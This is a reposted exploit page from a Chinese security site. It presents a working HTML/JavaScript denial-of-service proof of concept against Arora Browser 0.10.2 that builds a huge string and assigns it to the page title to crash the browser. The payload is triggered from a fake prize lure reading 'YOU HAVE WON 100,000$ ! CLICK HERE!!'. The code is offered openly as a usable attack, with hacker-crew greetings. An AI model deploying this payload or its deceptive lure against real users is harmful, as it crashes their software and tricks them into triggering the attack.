首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Arora Browser 0.10.2 Denial Of Service
来源:happyterminator@gmail.com 作者:Prashant 发布时间:2012-07-19  
/* 
 
         GGGGGG\                                                   
  GG  __GG\                                                  
  GG /  \__| aaaaaa\   rrrrrr\  aaaaaa\   gggggg\   eeeeee\  
  GG |GGGG\  \____aa\ rr  __rr\ \____aa\ gg  __gg\ ee  __ee\ 
  GG |\_GG | aaaaaaa |rr |  \__|aaaaaaa |gg /  gg |eeeeeeee |
  GG |  GG |aa  __aa |rr |     aa  __aa |gg |  gg |ee   ____|
  \GGGGGG  |\aaaaaaa |rr |     \aaaaaaa |\ggggggg |\eeeeeee\ 
    \______/  \_______|\__|      \_______| \____gg | \_______|
                                                gg\   gg |          
                                           gggggg  | 
 
Info-sec forum: http://garage4hackers.com
 
[+] Arora Browser v0.10.2 Remote Denial of Service
 
[+] Author: Prashant a.k.a t3rm!n4t0r
 
[+] C0ntact: happyterminator@gmail.com
 
[+] Platform: *nix
 
[+] Tested on: Ubuntu 11.04

[+] Previously worked for: QTweb, Avant, Midori
 
[+] Special Greets to: "vinnu",Shreyas and Secfence team

[+] Greets to: fb1h2s, b0nd, Eby,Punter, the_empty,warrior,
              abhaythehero,d3c0d3r,d4k357 and all hackers garage crew :)

*/
<html>
<head>
<title>Arora Browser Remote Denial of Service </title>
<body bgcolor="Grey">
<script type="text/javascript">
function loxians() {
    var buffer = "";
    for (var i = 0; i < 8000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 8000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2><a href="javascript:loxians();">YOU HAVE WON 100,000$ ! CLICK HERE!!</a></font></h2>
</body>
</html>
 





 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Setuid Nmap Exploit
·Novell ZENworks Configuration
·Novell ZENworks Configuration
·Google Chrome 19 metro_driver.
·Windows Escalate Task Schedule
·Intel SYSRET FreeBSD Privilege
·Linux Kernel Sendpage Local Pr
·DomsHttpd <= 1.0 Remote Denial
·ALLMediaServer 0.8 Buffer Over
·Simple Web Server 2.2 rc2 Remo
·Mc Full Audio Converter 1.3.0
·Novell ZENworks Configuration
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved